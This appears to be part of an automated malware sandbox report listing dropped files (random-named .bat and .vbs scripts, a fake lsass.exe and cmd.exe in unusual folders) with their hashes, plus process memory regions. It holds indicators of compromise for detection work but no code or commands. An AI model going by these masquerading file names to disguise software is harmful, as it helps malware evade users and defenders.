                                a603ec11a00ed1d9ccd58f6f414df7a6550a3f2fe3aaf953aac13cf1bf3a8983e2f1622fdf8fe50b957bc5e70ef83b6d5401b305c16ec1eb51314a8606aa3eda

                              • C:\Users\Admin\AppData\Local\Temp\1643e7d5-e16c-4687-846d-a0757bf86570.vbs

                                Filesize

                                477B

                                MD5

                                7aedbf4c51e2d9287a7b8cc951bd82df

                                SHA1

                                52d3fe8bbc6a569941b87e0e1993926c25b87a8b

                                SHA256

                                b0b76a49e2c6f1e4b38004bb432b88f62e956d138302ca0185951cf751ced776

                                SHA512

                                966395869d1a4b78785c55271120969f5a2adbe493ba9fe12c35f69811964230f8721ec42f6deb981508e4424b6a630c3654dfcc7450c3556bac6a3a08d3a7e3

                              • C:\Users\Admin\AppData\Local\Temp\2f4171b3-058b-4288-8dc4-85946c3d3649.vbs

                                Filesize

                                701B

                                MD5

                                b4ba1732d0b4e87036be70a698c800a3

                                SHA1

                                93f3ce12224bbe2860f92695bc1c73b7deb3f161

                                SHA256

                                7f7fe3ff12387c088a9e176dbc018bb743f623e4436fd2334ef9032cbd35743d

                                SHA512

                                9e8dd2c2bc0482d864183c72ad198de956e756e5514183810233ad227050817e61006ae97ae82032315791f15f080d37284ec40aff0d9ecb5c513a13dad92ccf

                              • C:\Users\Admin\AppData\Local\Temp\5wLWjZnu9K.bat

                                Filesize

                                190B

                                MD5

                                b50d517895549466ce69c06aef1a4bda

                                SHA1

                                668bfdae9b038da22825aa994ac8f3fbcbe1a361

                                SHA256

                                139c9b42aa1f4df66fb4d7aeebcb558febc1d61953f7b34a1d04f57579f8f079

                                SHA512

                                9e92c4c89206aebd63720f3d29b808e650c7d5357e8dd66ddf0a3f004135c70a5782fdedf5fce4e7684eeb1781f1d40d52430fb2b8a070cb68703c1e480f2bf1

                              • C:\Users\Admin\AppData\Local\Temp\DgHlPzdV8W.bat

                                Filesize

                                190B

                                MD5

                                84ff98f75b6d70e2f33e3b6ee2f807c7

                                SHA1

                                ef9c61f4342ac6c5eb838513965c61577e3ebf09

                                SHA256

                                8425367e13a42d3d172649299847377af94d64401d102e6bace63e4bf5830ac6

                                SHA512

                                4397ac9830598d25779d25cb38256c9f528d1323947fe2f70f7ef33f608d2fb6448fbd37477d67fb0911178cbf2c4523028053f6f28db87450fb13317190a10b

                              • C:\Users\Admin\AppData\Local\Temp\PLZx6pqUre

                                Filesize

                                40KB

                                MD5

                                a182561a527f929489bf4b8f74f65cd7

                                SHA1

                                8cd6866594759711ea1836e86a5b7ca64ee8911f

                                SHA256

                                42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                SHA512

                                9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                              • C:\Users\Admin\AppData\Local\Temp\QsS2ZSeOHk.bat

                                Filesize

                                190B

                                MD5

                                2ee029f89fe388b8f9af76112e5abcb9

                                SHA1

                                c99baac7c654a852bc1d0801425755f86647d984

                                SHA256

                                d6f49b77a7392080f0e5c1cf22095c35cf9f4d49631e7ce031bd028e25019902

                                SHA512

                                b59d8b18294473e67160ea63ea2706e5690bd4deda18553b39c026159559ccdce60cfefbb09240634bdd0a8c4c64df071a76e92a1a109e4c5ffff99131f2eb25

                              • C:\Users\Admin\AppData\Local\Temp\YeeJHhLP1x.bat

                                Filesize

                                190B

                                MD5

                                ff63ce24e7c1de05209c7ed7003f243a

                                SHA1

                                ed47a21be8fcdf76f40f9f07e4797a1aafdad6e3

                                SHA256

                                bde8074217573f4e467dabf68ae8b8a3b8156eb3aafab19c28e85dd33b1f8f22

                                SHA512

                                07693687c162c3f7cdd77a6b7528f3784a00ba024da5d4f59c13e3be2b49ec25fcf7a9aee0b4f68f746ff0cd5471dc1fc9e2a5abbcb61b5431d3e1f7454f6ae0

                              • C:\Users\Admin\AppData\Local\Temp\eoRA4B8PWR.bat

                                Filesize

                                190B

                                MD5

                                4755150d128aa205408ac2f36c3f6493

                                SHA1

                                41fa8b516a3fc55681c4a945c549f4290ebcb637

                                SHA256

                                eb9b28d211d13cabe713a71cff90c1be0fae977f3d399cd4e97ca8108bf4cead

                                SHA512

                                ae965e44a0725dd459a7fbe9877881c1cfe098b63ce453a300da7f6b344a17ade20a814e80cbbbd814dd139ada1e64eb83234d5a7902415a0d31c5f4369631fb

                              • C:\Users\Admin\AppData\Local\Temp\r0MODpJtud.bat

                                Filesize

                                190B

                                MD5

                                1c0c4ea45725747ba2d15a78b95ef8c1

                                SHA1

                                ba5c8bf2264964e378d4d3a8806bc5feef4aa1a2

                                SHA256

                                9dc5e176810fa96ede65d1697a08eeed931677a94f6341abc5f7c7c869ec4d5a

                                SHA512

                                21a77bb61723f385c6178f8d1e14b6b9cba0c5b2a6bbea180e3f51927d3836c72aeea7a044d3e9971554997882307665e91b8f8d993bcee9ad5c597f00007aea

                              • C:\Users\Admin\AppData\Local\Temp\rBMLF9HJtT.bat

                                Filesize

                                190B

                                MD5

                                9ffdb720efacf3af78a449400886e4fb

                                SHA1

                                313709a32732ae58084371ac4ac3c3b4f69e9835

                                SHA256

                                5bfc7c9afb977b6d681c822a228c83777092385b6d9356c6c09b338b915f68b6

                                SHA512

                                2ed8e7e058a951317f30a42957fcaffcc1e097f901b05fc1a4ce091b81453355efd15407f555e387ec1418338e7e803bd506609b4d41901dfec23db904c698e2

                              • C:\Users\Admin\AppData\Local\Temp\vqH0VxA5p1

                                Filesize

                                116KB

                                MD5

                                f70aa3fa04f0536280f872ad17973c3d

                                SHA1

                                50a7b889329a92de1b272d0ecf5fce87395d3123

                                SHA256

                                8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                SHA512

                                30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                              • C:\Users\Admin\AppData\Local\Temp\vvEvel52YF

                                Filesize

                                114KB

                                MD5

                                2ba42ee03f1c6909ca8a6575bd08257a

                                SHA1

                                88b18450a4d9cc88e5f27c8d11c0323f475d1ae6

                                SHA256

                                a14fb57193e6930fa9e410d9c55dfe98e3ae5e69b22356e621edc73683a581bd

                                SHA512

                                a1f32c22f0d78cba95c04c432e2a58ea47fb34942e70bfdceffcc2ac1e91b87a3da2cd9f93793427ee09a623c7da700e1c16977d41a44286317e8fc20502f035

                              • C:\Users\Admin\AppData\Local\Temp\zfOrxS71E3.bat

                                Filesize

                                190B

                                MD5

                                80ef4d52535ac7ba24669e9e97773ae3

                                SHA1

                                5583a366e90d636f61b136bbe0c8f0969d7558b2

                                SHA256

                                57d0a97abaade2e4445b29baec8956327ec802f777fcb8046a89b22d4d9dc80b

                                SHA512

                                e4440d12c86084ff043752e8a3949912dc3fcc0f1d7de78d7849e5440b952e4f33749f6634595c3e6ae0a5a2aec6e85b2fe5a5031669362ca798c3a2dbb4c3cb

                              • C:\Users\Admin\AppData\Local\Temp\zlYgv4zteq.bat

                                Filesize

                                190B

                                MD5

                                b0e0d35861d05db2b04a09234bde37c8

                                SHA1

                                9b2d6f399bf6b32e42866ff302c19104fdccc5b0

                                SHA256

                                92cb7c32841532ed56d7c4e4b88db2a1ee0ac10aad3bda281f983c563266d20e

                                SHA512

                                8b82f606fb6a934614193d7e5d63761e10822b3c51436f74a25f9742d50a95a17fe5d85d47b25423afb3882cb742b6035dabb3232989126c6828fc595c7a1e8e

                              • C:\Users\Default\Documents\RCXAFC1.tmp

                                Filesize

                                2.2MB

                                MD5

                                d49b746e993d91bc41fdba6a27ca17bc

                                SHA1

                                bc117ad939425c7c2ddb49024357b9c2fbbb53f5

                                SHA256

                                d7f5f19740d24e6320d80820d3a3bbc2dc24f54711ac1c62ef2d971d9f2cc0ad

                                SHA512

                                f4d75b2f5265449154bc0aea2c2a0eb4407f402da752a0486681433d0981bf4a3cc6e6102efe53010b6a033e9b5114643c2375369cacd0512a88be9f328d49fd

                              • C:\Users\Public\Videos\RCXCE3D.tmp

                                Filesize

                                2.2MB

                                MD5

                                4f18ea86161e94a4702bc197a9b28ee8

                                SHA1

                                d71a1fdd09d177f6df67070fc2d9c9442f62bdf3

                                SHA256

                                db0be9d56dbbd7947d9426408d4737eab35efb894f557444ed9256627f9d0439

                                SHA512

                                fb726fd16cc5572ae373b14219dbff4d646109b2602af6158a11b522aa6a09b9ca3b1e83c016e25e77d01b39f364f96eae745bfdf341916cae1080568adfc071

                              • C:\Users\Public\lsass.exe

                                Filesize

                                2.2MB

                                MD5

                                f311f1b22f15adeb06c90a4007669c6f

                                SHA1

                                8e8374d2a7f47c64f7ba119f49c418709f8f14f5

                                SHA256

                                14c9c44939d0f16e6d7c88902126290e23a12ad6889a81ead97e82bc4ec5cf3d

                                SHA512

                                359383a159be1a1c9a564616cb71e234a7a42346233b03d4df2af6774f6dd713c5ab844fb3e7df99048d6a7b96990afc459d7a3d2026d3a62d86266677d5e093

                              • C:\browserperf\BlockDriversession.exe

                                Filesize

                                2.2MB

                                MD5

                                1c6457696f89995d1d3140df11bb13d8

                                SHA1

                                9ce32ce6cd29863252e71f1b0246a18879d72020

                                SHA256

                                c16bc78cb749185c3a983fe9b739b3d47fd79265b0fc7c3c9527a2f0e9599294

                                SHA512

                                71dd011a43a4c71d692505006831449390cd0a9febc1b0b215d141cacbc603b1b13945d356ae4a2c6ecec2fbd4e43d6d714cac3505fec94e453e6da814f670f5

                              • C:\browserperf\DnCoBuHIAvg.vbe

                                Filesize

                                210B

                                MD5

                                df0c2d3f2c34d6585dab72e7c7e68ee2

                                SHA1

                                39a9526dbbd2fb22ecb42dff06dc24b4b0f2101a

                                SHA256

                                7f161d5bd44126e0933e733b46b0c4912db345667277506cc78d08a9464bb3e0

                                SHA512

                                8bf10e01a9024173bfb06313932a151e601c97178b00e885e25509ea30bdc5f00017943d67095725f2d3dde608d4f6126ac52166639831f17d3ee3ae391e64a3

                              • C:\browserperf\RcA8rkUQUHdsADqQUNtkjn.bat

                                Filesize

                                151B

                                MD5

                                9057cf6aa3be25586ce999472ed54810

                                SHA1

                                6f608a8f42892b7bb5383cbe5a3f0c6d7b66e45f

                                SHA256

                                f795fe0dcca481ca1f45663140832c1e3bf8c6d37f33712c67ae5d5dc90482ae

                                SHA512

                                7829c023b2dfce5751703ca26d1510d045e7c29ebe8ed086e65151eb22d0306316b26acda3a5d50568c42f94c8b42a762525adbaae4f4f39f6ceba05ec82f0f6

                              • C:\browserperf\cmd.exe

                                Filesize

                                2.2MB

                                MD5

                                f37fb0a09c0e0805c252a01e90919328

                                SHA1

                                bb1268dc15a4923e5602390a7858cba9b1457367

                                SHA256

                                4053601c096a144af686facf800e9c6a6d2f51c07edd64c4f945efd9f15ea91c

                                SHA512

                                be2c6dbaa5b07ee5172b73f5fac325e65b13c1db94e4306c4f81e35f4a777d4eccbdc6ee479d22ba928cb7ac6148fb2a30b8313a72c0f97a292a3a46765c6aa7

                              • memory/416-276-0x0000000000110000-0x000000000033E000-memory.dmp

                                Filesize

                                2.2MB

                              • memory/416-286-0x000000001DA20000-0x000000001DBE2000-memory.dmp

                                Filesize

                                1.8MB

                              • memory/1508-23-0x000000001B090000-0x000000001B0A0000-memory.dmp

                                Filesize

                                64KB

                              • memory/1508-27-0x000000001B7E0000-0x000000001B7EC000-memory.dmp

                                Filesize

                                48KB

                              • memory/1508-40-0x000000001BAF0000-0x000000001BAF8000-memory.dmp

                                Filesize

                                32KB

                              • memory/1508-37-0x000000001B960000-0x000000001B968000-memory.dmp

                                Filesize

                                32KB

                              • memory/1508-41-0x000000001BB00000-0x000000001BB0C000-memory.dmp

                                Filesize

                                48KB

                              • memory/1508-38-0x000000001B970000-0x000000001B97E000-memory.dmp

                                Filesize

                                56KB

                              • memory/1508-36-0x000000001BAE0000-0x000000001BAEE000-memory.dmp

                                Filesize

                                56KB

                              • memory/1508-35-0x000000001BAD0000-0x000000001BADA000-memory.dmp

                                Filesize

                                40KB

                              • memory/1508-34-0x000000001B850000-0x000000001B85C000-memory.dmp

                                Filesize

                                48KB

                              • memory/1508-206-0x00007FFAAE603000-0x00007FFAAE605000-memory.dmp

                                Filesize

                                8KB

                              • memory/1508-33-0x000000001B840000-0x000000001B84C000-memory.dmp

                                Filesize

                                48KB

                              • memory/1508-32-0x000000001B830000-0x000000001B83C000-memory.dmp

                                Filesize

                                48KB

                              • memory/1508-31-0x000000001BD60000-0x000000001C288000-memory.dmp

                                Filesize

                                5.2MB

                              • memory/1508-30-0x000000001B800000-0x000000001B812000-memory.dmp

                                Filesize

                                72KB

                              • memory/1508-28-0x000000001B7F0000-0x000000001B7F8000-memory.dmp

                                Filesize

                                32KB

                              • memory/1508-39-0x000000001B980000-0x000000001B98C000-memory.dmp

                                Filesize

                                48KB

                              • memory/1508-26-0x000000001B0C0000-0x000000001B0C8000-memory.dmp

                                Filesize

                                32KB

                              • memory/1508-25-0x000000001B0B0000-0x000000001B0BC000-memory.dmp

                                Filesize

                                48KB

                              • memory/1508-24-0x000000001B0A0000-0x000000001B0AA000-memory.dmp

                                Filesize

                                40KB

                              • memory/1508-22-0x000000001B080000-0x000000001B088000-memory.dmp

                                Filesize

                                32KB

                              • memory/1508-21-0x000000001B020000-0x000000001B02C000-memory.dmp

                                Filesize

                                48KB

                              • memory/1508-20-0x000000001B000000-0x000000001B016000-memory.dmp

                                Filesize

                                88KB

                              • memory/1508-16-0x000000001AFB0000-0x000000001AFCC000-memory.dmp

                                Filesize

                                112KB

                              • memory/1508-17-0x000000001B030000-0x000000001B080000-memory.dmp

                                Filesize

                                320KB

                              • memory/1508-18-0x000000001AFE0000-0x000000001AFE8000-memory.dmp

                                Filesize

                                32KB

                              • memory/1508-19-0x000000001AFF0000-0x000000001B000000-memory.dmp

                                Filesize

                                64KB

                              • memory/1508-15-0x000000001AFA0000-0x000000001AFAE000-memory.dmp

                                Filesize

                                56KB

                              • memory/1508-14-0x0000000002520000-0x000000000252E000-memory.dmp

                                Filesize

                                56KB

                              • memory/1508-13-0x0000000000270000-0x000000000049E000-memory.dmp

                                Filesize

                                2.2MB

                              • memory/1508-12-0x00007FFAAE603000-0x00007FFAAE605000-memory.dmp

                                Filesize

                                8KB